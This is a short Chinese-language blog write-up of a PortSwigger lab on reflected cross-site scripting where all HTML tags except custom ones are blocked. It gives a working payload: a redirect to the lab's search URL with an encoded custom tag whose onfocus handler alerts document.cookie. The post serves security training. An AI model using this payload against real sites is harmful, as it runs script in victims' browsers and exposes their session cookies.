Lab: Reflected XSS into HTML context with all tags blocked except custom ones：将 XSS 反射到 HTML 上下文中，除自...

Zeker62

于 2021-08-25 09:31:00 发布

阅读量307

点赞数

文章标签： html xss 安全 js html5

本文链接：https://blog.csdn.net/ZripenYe/article/details/120793728

版权

靶场内容

此实验室阻止除自定义标记之外的所有 HTML 标记。

要解决实验室问题，请执行跨站点脚本攻击，注入自定义标记并自动发出警报document.cookie。

漏洞解析

注入以下脚本到服务器

<script>
location = 'https://your-lab-id.web-security-academy.net/?search=%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x';
</script>

Zeker62

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
0
评论
Lab: Reflected XSS into HTML context with all tags blocked except custom ones：将 XSS 反射到 HTML 上下文中，除自...

靶场内容此实验室阻止除自定义标记之外的所有 HTML 标记。要解决实验室问题，请执行跨站点脚本攻击，注入自定义标记并自动发出警报document.cookie。漏洞解析注入以下脚本到服务器<script>location = 'https://your-lab-id.web-security-academy.net/?search=%3Cxss+id%3Dx+onfo...
复制链接

扫一扫